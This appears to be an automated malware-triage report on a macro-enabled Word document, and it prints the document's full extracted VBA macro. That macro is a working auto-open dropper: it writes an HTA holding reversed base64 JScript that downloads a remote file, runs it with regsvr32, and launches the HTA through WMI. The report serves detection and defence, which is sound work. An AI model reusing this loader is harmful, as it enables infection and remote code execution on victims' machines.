Verdict: MALICIOUS
Risk Score: 172
Heuristics: 7
Heuristic findings

- VBA project inside OOXML (severity: medium; 4 related findings; rule ID: OOXML_VBA)
  Document contains a VBA project — VBA macros present.

- VBA WMI Win32_Process launcher (severity: critical; rule ID: OLE_VBA_WMI_PROCESS_CREATE)
  VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  Matched line in script: Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")

- GetObject call (severity: high; rule ID: OLE_VBA_GETOBJ)
  GetObject call.
  Matched line in script: Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")

- VBA p-code auto-exec with execution tokens (severity: high; rule ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

- AutoOpen macro (severity: low; rule ID: OLE_VBA_AUTOOPEN)
  AutoOpen macro.
  Matched line in script: Sub autoopen()

- Suspicious extracted artifact (severity: info; rule ID: EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL (severity: info; rule ID: EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  All of the following URLs were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://ns.adobe.com/tiff/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6416 bytes |

SHA-256: b18f2f511523dcc8ff3ea3b15a3bf2a3f699ee8da4eb37179349c197666c93c4
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 3 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{12AF68DC-E22A-4710-B77F-BE5988B2B49E}{F93A32A7-32C6-4B6B-A837-7987553D2321}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function rm()
rm = StrReverse("ath.yarrApawSW\atadmargorp\:c exe.rerolpxe\swodniw\:c")
End Function
Public Sub button1_Click()
Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")
arraySizeData.Create p(rm)
End Sub
Attribute VB_Name = "screenExceptionConst"
Sub autoopen()
procedurePointerRef
End Sub
Function nvidia(optionDocumentConst, globalDocument)
If optionDocumentConst = 1 Then
nvidia = globalDocument
End If
End Function
Sub procedurePointerRef()
Dim structIndex As String
dataLinkTable = Split(p(frm.rm), " ")
structIndex = dataLinkTable(1)
Set valueNextDatabase = New removeScreen
valueNextDatabase.storageValue structIndex, lenMemLoad
frm.button1_Click
End Sub
Function deleteBuffer(tableListVb, optionException, bufLeftLen)
End Function
Attribute VB_Name = "memIndexSelect"
Function storagePastePaste(pointerMain As Long)
captionListbox = Chr(pointerMain)
storagePastePaste = nvidia(1, "<html><body><div id='content'>fTtlc29sYy5jb3JQZXZvbWVSZWxiYXQ7KTIgLCJncGoueWFyckFwYXdTV1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuY29yUGV2b21lUmVsYmF0Oyl5ZG9iZXNub3BzZXIubm9pdHBhQ3J0UHJldG5pb3AoZXRpcncuY29yUGV2b21lUmVsYmF0OzEgPSBlcHl0LmNvclBldm9tZVJlbGJhdDtuZXBvLmNvclBldm9tZVJlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSBjb3JQZXZvbWVSZWxiYXQgcmF2eykwMDIgPT0gc3V0YXRzLm5vaXRwYUNydFByZXRuaW9wKGZpOykoZG5lcy5ub2l0cGFDcnRQcmV0bmlvcDspZXNsYWYgLCJhZHNIR0tHWXBzOTBMPWRpJkYzVlp2djJaYz1kaT80dWxhbS8zNTA4My9zZ2")
End Function
Function trustConst(pointerMain As Long)
captionListbox = Chr(pointerMain)
trustConst = nvidia(1, "1JWldmZmU1eWZ2N2xVelc4U0hYV2hINGpQUEdoLzI3NzE3L204ekJibjh4SlNRYmJxQTRjaUxmVWhqZVpFQjNBYnlmbmF6UXVvem9BOFcvYUJUVExYcVVKVjF4a1NIV21MMEw1WFlhaG03UGdwdFNMMEFZN3h0aDNVR3MvZUVwbER3UkhYZTN4SXFnZ1doZ0xhL3RwMWdoZEtsQUNLa2k5RndQUEZINmNwOC8zQ1ZCZnFOZC8wRHBFWlRjN0R4YTNsenRkMXlMUzV1Y1JyVnJvdVRFaTdWc1FNMzMvc3l1b2cvbW9jLjEwMDJkcmFueWFtLXRyb3MvLzpwdHRoIiAsIlRFRyIobmVwby5ub2l0cGFDcnRQcmV0bmlvcDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IG5vaXRwYUNydFByZXRuaW9wIHJhdg==|fXspeG9idHhlVHlyZXVxKGhjdGFjfTspImF0aC55YXJyQXBhd")
End Function
Function indexIndex(pointerMain As Long)
captionListbox = Chr(pointerMain)
indexIndex = nvidia(1, "1NXXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZmV0ZWxlZC5lbHRpVGxhY29se3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGVsdGlUbGFjb2wgcmF2OykiZ3BqLnlhcnJBcGF3U1dcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuKSJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3'></div><script language='javascript'>function queryTempConst(indexClear){return(new ActiveXObject(indexClear));}function namespaceConvertMe")
End Function
Function buttonStorageA(pointerMain As Long)
captionListbox = Chr(pointerMain)
buttonStorageA = nvidia(1, "mory(tmpRepo){return(tableCaption.getElementById(tmpRepo).innerHTML);}function requestTable(){var queryProcedureRemove = namespaceConvertMemory('table1');var textboxTmpNext = queryProcedureRemove.toLowerCase();var queryText = namespaceConvertMemory('table2');return(queryProcedureRemove + textboxTmpNext + queryText);}function variableMainList(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var trustFuncVb=''; var w=String.fromCharCode; var L=s.length;var variablePtr = 'charAt';for(i=0;i<64;i++){e[")
End Function
Function structStorage(pointerMain As Long)
captionListbox = Chr(pointerMain)
structStorage = nvidia(1, "requestTable()[variablePtr](i)]=i;}for(x=0;x<L;x++){c=e[s[variablePtr](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(trustFuncVb+=w(a));}}return(trustFuncVb);};function varIndex(constLeft){return constLeft.split('').reverse().join('');}vbMemTemp = window;tableCaption = document;vbMemTemp.resizeTo(1, 1);vbMemTemp.moveTo(-100, -100);var iteratorTextClear = tableCaption.getElementById('content').innerHTML;var iteratorTextClear = iteratorTextClear.split('|');var localDatabaseGeneric = var")
End Function
Function queryProcedureIterator(pointerMain As Long)
captionListbox = Chr(pointerMain)
queryProcedureIterator = nvidia(1, "Index(variableMainList(iteratorTextClear[0]));var tmpGenericLink = varIndex(variableMainList(iteratorTextClear[1]));</script><script language='javascript'>function tableDocument(removePaste){var ExMemorySelect = queryTempConst('msscriptcontrol.scriptcontrol');ExMemorySelect.Language = 'jscript';ExMemorySelect.Timeout = 60000;ExMemorySelect.AddCode(removePaste);return(null);}</script><script language='vbscript'>tableDocument localDatabaseGeneric : tableDocument tmpGenericLink : vbMemTemp.close</script></body")
End Function
Function listTmp(pointerMain As Long)
captionListbox = Chr(pointerMain)
listTmp = nvidia(1, "></html>")
End Function
Function lenMemLoad()
lenMemLoad = storagePastePaste(2) + trustConst(0) + indexIndex(0) + buttonStorageA(4) + structStorage(1) + queryProcedureIterator(6) + listTmp(0)
End Function
Attribute VB_Name = "removeScreen"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub storageValue(windowListbox As String, funcButton As String)
Dim namespaceCounter As FileSystemObject
Set namespaceCounter = New FileSystemObject
Dim captionRemove As TextStream
Set captionRemove = namespaceCounter.CreateTextFile(windowListbox)
captionRemove.WriteLine funcButton
captionRemove.Close
Set captionRemove = Nothing
Set namespaceCounter = Nothing
End Sub
Attribute VB_Name = "countResponseArray"
Function p(linkTextbox)
p = linkTextbox
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |

SHA-256: 49a8f96470558ec45fbab958c83c97c198b397f493defcf685d84304e7264fde
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 3 long base64-like blobs)